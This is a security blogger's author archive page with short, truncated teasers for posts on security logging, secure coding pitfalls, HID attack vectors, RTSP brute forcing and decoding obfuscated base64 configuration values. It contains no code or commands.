Author Archives : Tek Tengu

FLACK – A Practical Approach To Application Logging For Security

Introduction Modern development practices have minimized application logging in production environments. Many factors have contributed to this that include: Rapid prototype-to-development practices that ignore adding practical production logging. Myopic focuses on optimized and resource minimal code that consider logging a burden. Comment-less, log-less development styles that focus on pumping out code, not errata. Regardless of […]

Coding for Security – Some Developer Pitfalls

Over the next few weeks, I will be releasing some teaser information from my talk, “Secure Coding: What “Bad Guy” Wants You To Do”. Its an hour talk I am available to give to any organization. Please contact me to book a time. Background… This talk takes a less traditional approach to talking about secure […]

Good technical article on the hazards of HID (Human Interface Devices)

Below is a link to a good (technical) article on some of the new nefarious things one can do by using HID (Human Interface Device) vectors. For those of you non-technical (and maybe even a few technical) types, gone are the days where USB and other storage media drives were the “hack” of the day. […]

RTSP Brute Forcing for fun and naked pictures?

RTSP… Real Time Streaming Protocol… is a protocol largely ignored these days. Once the infrastructure relied upon in the early days of multimedia (Video) and developed by RealNetworks, RTSP resides largely in the background of common protocols we pay attention to as InfoSec professionals  these days. Typically found on port 554, RTSP is still a […]

Hacker Diaries: Base 64 Hacking

Recently I ran into some database connectors that were obfuscated in the configuration file. I ran typical Base 64, UUEncode, etc techniques to reverse the obfuscation, but nothing worked. Then a co-worker of mine mentioned, “yeah its probably base 64, but they used a different indexing scheme”. Good point! Sometimes we get so use to […]